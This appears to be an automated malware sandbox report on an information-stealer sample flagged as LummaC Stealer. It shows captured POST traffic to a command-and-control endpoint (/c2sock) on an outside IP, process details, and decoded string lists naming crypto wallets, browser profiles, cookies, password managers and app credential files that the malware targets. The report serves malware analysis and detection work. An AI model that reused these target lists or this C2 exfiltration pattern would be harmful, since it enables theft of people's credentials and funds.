Nov 13, 2024 10:53:47.815625906 CET	2472	OUT	Data Raw: aa 75 43 db ff 5b fd 67 aa f4 7b 84 be 4b 05 7e 97 e5 bd ac ff b5 ae ff d9 fe 5f eb 7f 1d bd ff b7 59 fc cf e4 80 f5 f2 bf 80 fd b5 98 ff d9 fe 5f eb 7f ad e0 7f 14 eb 7f f9 f6 ff 5a ff b3 fd bf 8d f2 3f 53 dd 5f 23 fd 2f ae 1f 38 6c 80 ed 21 db Data Ascii: uC[g{K~_Y_Z?S_#/8l!?Y!\/>bo<e q3F99 \|}o_&}O?6'}8:Al\|gqutYd~I5f\.UZ
Nov 13, 2024 10:53:47.815646887 CET	4944	OUT	Data Raw: 88 0a 7f ce 30 e7 df 11 43 61 cf 5f 74 5f 29 d6 00 17 3a ff bd 3d dd f9 ef a9 89 83 0a ea e9 0b ca a1 7d ca 84 94 e1 f7 66 b9 36 ea be e7 9c 3c 25 ce bd 7e 73 39 b8 6e fa 2d ce 7f 83 39 ce b0 e0 de f2 71 ba fe a9 0b 82 f7 a7 0d 7d 67 fa 3d e8 77 Data Ascii: 0Ca_t_):=}f6<%~s9n-9q}g=wIiUM6pvt>pGtWVs(_;Smo+&`5z&pw;/s[`\|d3>Kz~0;_
Nov 13, 2024 10:53:47.815778017 CET	2472	OUT	Data Raw: f5 30 c0 66 f6 bf 4a 0c 30 ca ff b0 0e 60 35 b3 40 f2 f6 bf 58 03 6c 32 ff 93 6b 07 a6 f5 bf 85 d7 97 ac ff d5 c0 ff ca 06 68 fd cf 9c 92 8e f5 3f eb 7f 9d d2 ff 0c ee 57 89 ff bd fc b3 f6 c6 f8 9f e3 7e 48 3d fc 2f 6a 7d 3f de eb 9b c9 ff 44 df Data Ascii: 0fJ0`5@Xl2kh?W~H=/j}?DoTk2Bwlz0>qh}4d~\|X_=zgrC \|Q%k`z0?n=rsjd/@9x!
Nov 13, 2024 10:53:47.815795898 CET	4944	OUT	Data Raw: d2 19 fc 2f cd ba 7f d6 ff 1a ef 7f b4 6f fd 2f 9b ff f1 b5 ff b8 ff 55 6c 80 2d de ff 8b f5 01 79 0d 60 b0 07 b8 2d b2 d6 cf 54 17 18 5a 47 30 a5 ff f1 b5 01 b3 f8 9f 69 2e 08 f7 bf b8 de 5f f7 9a 76 e3 0c 10 3e 0b c4 64 7f 51 f3 80 43 eb 00 c6 Data Ascii: /o/Ul-y`-TZG0i._v>dQCz}?mZ@+}\|@\=356X/TEM&A!e+4 3}\_=\ Z3^Xc0_^/z'KkjO_,?
Nov 13, 2024 10:53:47.820944071 CET	4944	OUT	Data Raw: 2b e4 e6 47 35 82 63 fa f5 0c cc 08 e6 56 c8 0d 10 c7 d0 43 cc 67 04 f3 39 22 74 8e cf 11 96 6b 0e a2 a7 17 5e 68 9a 07 2c 67 02 f3 1a c2 5a f8 df 18 cf ff ae f3 fc ef ea 79 5e 0d a0 67 80 37 57 e8 7f 33 a6 bf 5e 77 ff 8b b3 99 0f e8 d5 f3 3f 44 Data Ascii: +G5cVCg9"tk^h,gZy^g7W3^w?D>:$dZ^UiaW5o=Rg~zg_BM=%Yk:Xk:g/[/u0'$H7v@~Ikcw?&(
Nov 13, 2024 10:53:47.821868896 CET	4944	OUT	Data Raw: bc 38 d7 43 6d 5f d2 7a 80 3a 7d db f5 8c 0f 0a 7a 7e f9 3e 39 9d a9 ef 17 35 81 b0 3c 78 1f 9f ef 8b fa 40 d3 0c 60 1c 83 f5 a1 de 0f fe c7 d7 ff e3 36 c8 d7 00 74 67 04 b7 05 3c 4e ae f5 c7 d7 03 44 7d 20 ce d3 3e ef eb 35 d5 ff 49 ff c3 fb f8 Data Ascii: 8Cm_z:}z~>95<x@`6tg<ND} >5Ib0_keR3w(vs__P_P>?_w.f~;&}-7HVL} e@fHKIU>ag

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49981	94.158.244.69	80	7712	C:\Users\user\Desktop\OlZzqwjrwO.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:53:56.922374964 CET	188	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 440 Host: 94.158.244.69
Nov 13, 2024 10:53:56.922898054 CET	440	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49982	94.158.244.69	80	7712	C:\Users\user\Desktop\OlZzqwjrwO.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:54:05.730923891 CET	188	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 440 Host: 94.158.244.69
Nov 13, 2024 10:54:05.731324911 CET	440	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.9	49983	94.158.244.69	80	7712	C:\Users\user\Desktop\OlZzqwjrwO.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:54:14.671668053 CET	188	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 440 Host: 94.158.244.69
Nov 13, 2024 10:54:14.672238111 CET	440	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"3--SqDe87817huf871793q74Content-Disposition: form-data;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.9	49984	94.158.244.69	80	7712	C:\Users\user\Desktop\OlZzqwjrwO.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:54:23.460114956 CET	188	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 440 Host: 94.158.244.69
Nov 13, 2024 10:54:23.460529089 CET	440	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.9	49985	94.158.244.69	80	7712	C:\Users\user\Desktop\OlZzqwjrwO.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:54:32.253587008 CET	188	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 440 Host: 94.158.244.69
Nov 13, 2024 10:54:32.254940987 CET	440	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.9	49986	94.158.244.69	80	7712	C:\Users\user\Desktop\OlZzqwjrwO.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:54:41.037240982 CET	188	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 440 Host: 94.158.244.69
Nov 13, 2024 10:54:41.037622929 CET	440	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;

Target ID:	0
Start time:	04:51:56
Start date:	13/11/2024
Path:	C:\Users\user\Desktop\OlZzqwjrwO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\OlZzqwjrwO.exe"
Imagebase:	0x400000
File size:	476'672 bytes
MD5 hash:	30CA3A9970C190D36EF5AB08D64406E6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3107115385.0000000000979000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.1340247273.00000000008F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:54:48
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 1656
Imagebase:	0x4e0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	11.1%
Signature Coverage:	51.5%
Total number of Nodes:	787
Total number of Limit Nodes:	26

Executed Functions

Function 004069A1 Relevance: 208.6, APIs: 6, Strings: 112, Instructions: 2052stringCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(?,?), ref: 00406AFC
lstrcatW.KERNEL32(?,\Local Storage\leveldb), ref: 00406B06
lstrcatW.KERNEL32(?,?,?), ref: 00408A66
lstrcatW.KERNEL32(?,/BrowserDB), ref: 00408A70

Strings

nlbm576xednnijcnlegkjjpcfjclm576xedcfggfefdm, xrefs: 004081D0
Le576xedaf, xrefs: 00407881
UL6T, xrefs: 0040702D
Te576xedmple, xrefs: 00408068
Ste576xedem Key576xedchain, xrefs: 0040827B
infe576xedboajgfhgbjpjbeppbkg576xednabfdkdaf, xrefs: 00407868
GAu576xedth Authe576xednticator, xrefs: 00407298
EeS, xrefs: 00407043
\Local Storage\leveldb, xrefs: 00406AFE
aiifb576xednbfobpmeekiphe576xedeijimdpnlpgpp, xrefs: 0040725B
bcopg576xedchhojmggmff576xedilplmbdicgaihlkp, xrefs: 004080DA
Coinb576xedase, xrefs: 004083FB
jbd576xedaocneiiinmjbj576xedlgalhcelgbejmnid, xrefs: 00407D6E
Wom576xedbat, xrefs: 004077AD
kln576xedaejjgbibmhlephnh576xedpmaofohgkpgkd, xrefs: 00407479
EQ576xedUAL, xrefs: 004076A5
His576xedtory, xrefs: 004083AF
Bi576xedtClip, xrefs: 00407FD4
Ja576xedxx Lib576xederty, xrefs: 0040881F
nknhi576xedehlklippafakaeklbegl576xedecifhad, xrefs: 00408027
Ron576xedin Wall576xedet, xrefs: 004085CE
cphhlg576xedmgameodnhkjdmkpa576xednlelnlohao, xrefs: 00407CC1
kkpllko576xeddjeloidieedojogacfhp576xedaihoh, xrefs: 004088A7
onof576xedpnbbkehpmmoa576xedbgpcpmigafmmnjhl, xrefs: 004080AE
Me576xedtaMa576xedsk, xrefs: 00406E46, 004087D8
ijmp576xedgkjfkbfho576xedebgogflfebnmejmfbml, xrefs: 00407FE3
Tro576xednLi576xednk, xrefs: 00407616
Te576xedrra Stat576xedion, xrefs: 0040724B
fihka576xedkfobkmkjojpchpf576xedgcmhfjnmnfpi, xrefs: 00408856
nlgbh576xeddfgdhgbiamfdfmb576xedikcdghidoadd, xrefs: 00407D4F
Coi576xedn98, xrefs: 00407492
ibnejdfjmmk576xedpcnlpebklmnk576xedoeoihofec, xrefs: 00407625
ffn576xedbelfdoeiohenk576xedjibnmadjiehjhajb, xrefs: 00408152
Au576xedthy, xrefs: 00406CF1
Na576xedsh Ex576xedtension, xrefs: 0040809F
imloif576xedkgjagghnncjkhgg576xeddhalmcnfklk, xrefs: 00408216
Sa576xedturn, xrefs: 00407C8A
Ke576xedplr, xrefs: 004084A0
nkd576xeddgncdjgjfcddamfg576xedcmfnlhccnimig, xrefs: 00407C99
Pol576xedymesh, xrefs: 004075AC
kn576xedcchdigobgh576xedenbbaddojjnnaogfppfj, xrefs: 0040887E
ejbalbako576xedplchlghecda576xedlmeeeajnimhm, xrefs: 00406E55
mnfif576xedefkajgofkcjkemidiae576xedcocnkjeh, xrefs: 00407F93
afbc576xedbjpbpfadlkmhm576xedclhkeeodmamcflc, xrefs: 004083E2
jojhf576xedeoedkpkglbfimdfabp576xeddfjaoolaf, xrefs: 004075BB
gae576xeddmjdfmmahhbj576xedefcbgaolhhanlaolb, xrefs: 00406D00
EnK576xedrypt, xrefs: 00408897
bhgho576xedamapcdpbohphigoo576xedoaddinpkbai, xrefs: 004074C9
Lo576xedgin Da576xedta, xrefs: 0040864F
Uni576xedSat, xrefs: 004082D2
bln576xedieiiffboi576xedllknjnepogjhkgnoapac, xrefs: 00408804
Pha576xedntom, xrefs: 0040822F
Au576xedro, xrefs: 00407584
cj576xedelfplplebdjjenllpjcbl576xedmjkfcffne, xrefs: 0040882E
ppbibelpc576xedjmhbdihakflkd576xedcoccbgbkpo, xrefs: 004082E5
amkmj576xedjmmflddogmhpjloim576xedipbofnfjih, xrefs: 004073C2
Gu576xedild, xrefs: 004081EB
Cl576xedover, xrefs: 004087AC
bfn576xedaelmomeim576xedhlpmgjnjophhpkkoljpa, xrefs: 00408242
cnma576xedmaachppnkjgnil576xeddpdmkaakejnhae, xrefs: 00407593
/BrowserDB, xrefs: 00408A68
One576xedKey, xrefs: 00407859
Te576xedzBox, xrefs: 00407F84
ookjlb576xedkiijinhpmnjffcofj576xedonbfbgaoc, xrefs: 00407F69
Cy576xedano, xrefs: 00407AE5
oel576xedjdldpnmdbchonieli576xeddgobddffflal, xrefs: 00406D28
W576xedeb Da576xedta, xrefs: 00408697
hnfanknocfe576xedofbddgcijnm576xedhnfnkdnaad, xrefs: 0040840A
iW576xedlt, xrefs: 0040886F
Log576xedin Da576xedta Fo576xedr Acc576xedount, xrefs: 00408667
ME576xedW CX, xrefs: 004073DD
fhbohimaelboh576xedpjbbldcngcnapn576xeddodjp, xrefs: 00408128
Ma576xedth, xrefs: 004083D3
dkded576xedlpgdmmkkfjabffeg576xedanieamfklkm, xrefs: 00407AF8
kpfop576xedkelmapcoipemfend576xedmdcghnegimn, xrefs: 00407EED
EeS, xrefs: 00406B7F
Nab576xedox, xrefs: 00408018
E576xedOS Authenti576xedcator, xrefs: 00406D19
Gua576xedrda, xrefs: 00408423
NeoL576xedine, xrefs: 00407CB2
lkcjl576xednjfpbikmcm576xedbachjpdbijejflpcm, xrefs: 00408084
lodccj576xedjbdhfakaekdiahmedf576xedbieldgik, xrefs: 00407FBB
Yo576xedroi, xrefs: 00408143
By576xedone, xrefs: 004076ED
Sol576xedlet, xrefs: 004088F4
Liqu576xedality, xrefs: 00407EDD
nanj576xedmdknhkinifnkgdcggcfnhd576xedaammmj, xrefs: 00407D13
Hy576xedcon Lite Cli576xedent, xrefs: 004080C7
nhnk576xedbkgjikgcigadomkph576xedalanndcapjk, xrefs: 004087BC
Hist576xedory, xrefs: 0040867F
fhmfend576xedgdocmcbmfikdcog576xedofphimnkno, xrefs: 00408903
hpg576xedlfhgfnhbgpjden576xedjgmdgoeiappafln, xrefs: 0040768A
dmkam576xedcknogkgcdfhhbddcghach576xedkejeap, xrefs: 004084B0
aea576xedchknmefphepccio576xednboohckonoeemg, xrefs: 004074A1
Aut576xedhenti576xedcator, xrefs: 004074BA
Ni576xedfty, xrefs: 0040816B
ilgcn576xedhelpchnceeipipij576xedaljkblbcobl, xrefs: 004072A7
flpici576xedilemghbmfalica576xedjoolhkkenfel, xrefs: 004075E4
KH576xedC, xrefs: 00408040
hcflp576xedincpppdclinealmandi576xedjcmnkbgn, xrefs: 0040804F
Netw576xedork\Cook576xedies, xrefs: 00408505
nkbihfbeo576xedgaeaoehlef576xednkodbefgpgknn, xrefs: 004087E8
fnjhmkhhmkb576xedjkkabndcn576xednogagogbneec, xrefs: 004085DD
Bin576xedance Cha576xedin Wal576xedlet, xrefs: 004085F6
ICO576xedNex, xrefs: 004075D4
DAp576xedpPlay, xrefs: 00407FAC
Tr576xedezor Passw576xedord Manager, xrefs: 00408207
cihm576xedoadaighcej576xedopammfbmddcmdekcje, xrefs: 004086BB
VL6T, xrefs: 004076C1
Bit576xedApp, xrefs: 00408847
VL6T, xrefs: 0040891C
Zi576xedlPay, xrefs: 0040746A

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: lstrcat
String ID: /BrowserDB$Au576xedro$Au576xedthy$Aut576xedhenti576xedcator$Bi576xedtClip$Bin576xedance Cha576xedin Wal576xedlet$Bit576xedApp$By576xedone$Cl576xedover$Coi576xedn98$Coinb576xedase$Cy576xedano$DAp576xedpPlay$E576xedOS Authenti576xedcator$EQ576xedUAL$EnK576xedrypt$EeS$EeS$GAu576xedth Authe576xednticator$Gu576xedild$Gua576xedrda$His576xedtory$Hist576xedory$Hy576xedcon Lite Cli576xedent$ICO576xedNex$Ja576xedxx Lib576xederty$KH576xedC$Ke576xedplr$Le576xedaf$Liqu576xedality$Lo576xedgin Da576xedta$Log576xedin Da576xedta Fo576xedr Acc576xedount$ME576xedW CX$Ma576xedth$Me576xedtaMa576xedsk$Na576xedsh Ex576xedtension$Nab576xedox$NeoL576xedine$Netw576xedork\Cook576xedies$Ni576xedfty$One576xedKey$Pha576xedntom$Pol576xedymesh$Ron576xedin Wall576xedet$Sa576xedturn$Sol576xedlet$Ste576xedem Key576xedchain$Te576xedmple$Te576xedrra Stat576xedion$Te576xedzBox$Tr576xedezor Passw576xedord Manager$Tro576xednLi576xednk$UL6T$Uni576xedSat$VL6T$VL6T$W576xedeb Da576xedta$Wom576xedbat$Yo576xedroi$Zi576xedlPay$\Local Storage\leveldb$aea576xedchknmefphepccio576xednboohckonoeemg$afbc576xedbjpbpfadlkmhm576xedclhkeeodmamcflc$aiifb576xednbfobpmeekiphe576xedeijimdpnlpgpp$amkmj576xedjmmflddogmhpjloim576xedipbofnfjih$bcopg576xedchhojmggmff576xedilplmbdicgaihlkp$bfn576xedaelmomeim576xedhlpmgjnjophhpkkoljpa$bhgho576xedamapcdpbohphigoo576xedoaddinpkbai$bln576xedieiiffboi576xedllknjnepogjhkgnoapac$cihm576xedoadaighcej576xedopammfbmddcmdekcje$cj576xedelfplplebdjjenllpjcbl576xedmjkfcffne$cnma576xedmaachppnkjgnil576xeddpdmkaakejnhae$cphhlg576xedmgameodnhkjdmkpa576xednlelnlohao$dkded576xedlpgdmmkkfjabffeg576xedanieamfklkm$dmkam576xedcknogkgcdfhhbddcghach576xedkejeap$ejbalbako576xedplchlghecda576xedlmeeeajnimhm$ffn576xedbelfdoeiohenk576xedjibnmadjiehjhajb$fhbohimaelboh576xedpjbbldcngcnapn576xeddodjp$fhmfend576xedgdocmcbmfikdcog576xedofphimnkno$fihka576xedkfobkmkjojpchpf576xedgcmhfjnmnfpi$flpici576xedilemghbmfalica576xedjoolhkkenfel$fnjhmkhhmkb576xedjkkabndcn576xednogagogbneec$gae576xeddmjdfmmahhbj576xedefcbgaolhhanlaolb$hcflp576xedincpppdclinealmandi576xedjcmnkbgn$hnfanknocfe576xedofbddgcijnm576xedhnfnkdnaad$hpg576xedlfhgfnhbgpjden576xedjgmdgoeiappafln$iW576xedlt$ibnejdfjmmk576xedpcnlpebklmnk576xedoeoihofec$ijmp576xedgkjfkbfho576xedebgogflfebnmejmfbml$ilgcn576xedhelpchnceeipipij576xedaljkblbcobl$imloif576xedkgjagghnncjkhgg576xeddhalmcnfklk$infe576xedboajgfhgbjpjbeppbkg576xednabfdkdaf$jbd576xedaocneiiinmjbj576xedlgalhcelgbejmnid$jojhf576xedeoedkpkglbfimdfabp576xeddfjaoolaf$kkpllko576xeddjeloidieedojogacfhp576xedaihoh$kln576xedaejjgbibmhlephnh576xedpmaofohgkpgkd$kn576xedcchdigobgh576xedenbbaddojjnnaogfppfj$kpfop576xedkelmapcoipemfend576xedmdcghnegimn$lkcjl576xednjfpbikmcm576xedbachjpdbijejflpcm$lodccj576xedjbdhfakaekdiahmedf576xedbieldgik$mnfif576xedefkajgofkcjkemidiae576xedcocnkjeh$nanj576xedmdknhkinifnkgdcggcfnhd576xedaammmj$nhnk576xedbkgjikgcigadomkph576xedalanndcapjk$nkbihfbeo576xedgaeaoehlef576xednkodbefgpgknn$nkd576xeddgncdjgjfcddamfg576xedcmfnlhccnimig$nknhi576xedehlklippafakaeklbegl576xedecifhad$nlbm576xednnijcnlegkjjpcfjclm576xedcfggfefdm$nlgbh576xeddfgdhgbiamfdfmb576xedikcdghidoadd$oel576xedjdldpnmdbchonieli576xeddgobddffflal$onof576xedpnbbkehpmmoa576xedbgpcpmigafmmnjhl$ookjlb576xedkiijinhpmnjffcofj576xedonbfbgaoc$ppbibelpc576xedjmhbdihakflkd576xedcoccbgbkpo
API String ID: 4038537762-1377293222
Opcode ID: d76d7c670001a5dbd7c9de7b01bcafc77f6a8fb9cd7de87a96b03e98a683fc98
Instruction ID: d3b4c8d05487b98e51841e16d8283d2e4e5c243acd67d22c1ca68150be5d60ea
Opcode Fuzzy Hash: d76d7c670001a5dbd7c9de7b01bcafc77f6a8fb9cd7de87a96b03e98a683fc98
Instruction Fuzzy Hash: 05E229F2E001065AEF2896588D8357F7969EB14304F25453FF80AF63D1EA3C8E558A9F

Function 0042D658 Relevance: 105.3, Strings: 83, Instructions: 1594COMMON

Download Yara Rule

Strings

%programfiles%\Steam\config, xrefs: 0042DCB9
CocCoc, xrefs: 0042DA7E
Wall576xedets/Ele576xedctrum, xrefs: 0042EE9A
%userprofile%, xrefs: 0042DC83
%appdata%\Ledger Live, xrefs: 0042EAE5
TT4, xrefs: 0042DF2F
%appdata%\com.liberty.jaxx\IndexedDB, xrefs: 0042ED4F
sitemanager.xml, xrefs: 0042DC67
%locala576xedppdata%\Mic576xedrosoft\Edge\Us576xeder Data, xrefs: 0042DA33
%appda576xedta%\Op576xedera Softwa576xedre\Op576xedera Neo576xedn\Us576xeder Da576xedta, xrefs: 0042EC90
Import576xedant File576xeds/Pro576xedfile, xrefs: 0042F04F
Ed576xedge, xrefs: 0042E788
%userpro576xedfile%, xrefs: 0042DB79
Applications/FileZilla, xrefs: 0042DC49, 0042DC4E, 0042DC66
%appd576xedata%\Ope576xedra Soft576xedware\Op576xedera Sta576xedble, xrefs: 0042D8E5
TT4, xrefs: 0042EB40
$jRk, xrefs: 0042DED9
Aan(, xrefs: 0042DB43
%programfiles%\Steam, xrefs: 0042DC9E
%appdata%\Authy Desktop\Local Storage\leveldb, xrefs: 0042ED1D
Applications/Telegram, xrefs: 0042DEF6
Comodo, xrefs: 0042ECC2
TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 0042D700, 0042E5E2
Applications/Steam/config, xrefs: 0042DCAF
ST4, xrefs: 0042D951
Mozi576xedlla Firef576xedox, xrefs: 0042D7E1
?, xrefs: 0042ECD4
*.leveldb, xrefs: 0042ED4A
%appdata%\AnyDesk, xrefs: 0042DC38
Wallets/Exodus, xrefs: 0042EAC3
Kom576xedeta, xrefs: 0042E818
Wallets/Coinomi, xrefs: 0042ED00
Wall576xedets/Eth576xedereum, xrefs: 0042EE17
Wallets/JAXX New Version, xrefs: 0042ED45
%appda576xedta%\Bina576xednce, xrefs: 0042DBB8, 0042DD8C, 0042EE79
%localappdata%\Coinomi\Coinomi\wallets, xrefs: 0042ED06
%appd576xedata%\El576xedectrum\wal576xedlets, xrefs: 0042E541
%appd576xedata%\Ethe576xedreum, xrefs: 0042EA9E
Wallets/Bitcoin core, xrefs: 0042ED2E
Op576xedera G576xedX Stab576xedle, xrefs: 0042EBA1
Wal576xedlets/Bi576xednance, xrefs: 0042DBD5
%lo576xedcalapp576xeddata%\Go576xedogle\Chr576xedome\Us576xeder Dat576xeda, xrefs: 0042E957
%loc576xedalappda576xedta%\Kom576xedeta\Us576xeder Da576xedta, xrefs: 0042E827
*.576xedtxt, xrefs: 0042EEB6
*.kbdx, xrefs: 0042DC7E
Wallets/Electrum, xrefs: 0042ED60
.fin576xedger-pr576xedint.fp, xrefs: 0042DD7C
recentservers.xml, xrefs: 0042DC4F
ap576xedp-sto576xedre.js576xedon, xrefs: 0042DBA9
@an(, xrefs: 0042D868
%appdata%\Electrum\wallets, xrefs: 0042ED66
Applications/AnyDesk, xrefs: 0042DC2E
sim576xedple-sto576xedrage.j576xedson, xrefs: 0042EE6A
Chromi576xedum, xrefs: 0042E75F
Op576xedera Sta576xedble, xrefs: 0042E4D1
Wallets/Ledger Live, xrefs: 0042EADF
*576xed, xrefs: 0042E532
Chr576xedome, xrefs: 0042E948
%appdata%\atomic\Local Storage\leveldb, xrefs: 0042ECEF
%localappdata%\CocCoc\Browser\User Data, xrefs: 0042DA83
Applications/KeePass, xrefs: 0042DC79
q7 C, xrefs: 0042E450
*.conf, xrefs: 0042DC33
%appdata%\Telegram Desktop, xrefs: 0042DF00
%localappdata%\BraveSoftware\Brave-Browser\User Data, xrefs: 0042ECB2
Aan(, xrefs: 0042D889
Wall576xedets/Binan576xedce, xrefs: 0042DB9A
%localappdata%\Comodo\Dragon\User Data, xrefs: 0042ECC7
%appdata%\Bitcoin\wallets, xrefs: 0042ED34
Op576xedera Neo576xedn, xrefs: 0042EC81
keyst576xedore, xrefs: 0042EE27
%appdata%\Exodus\exodus.wallet, xrefs: 0042EACE
ssfn*, xrefs: 0042DC99
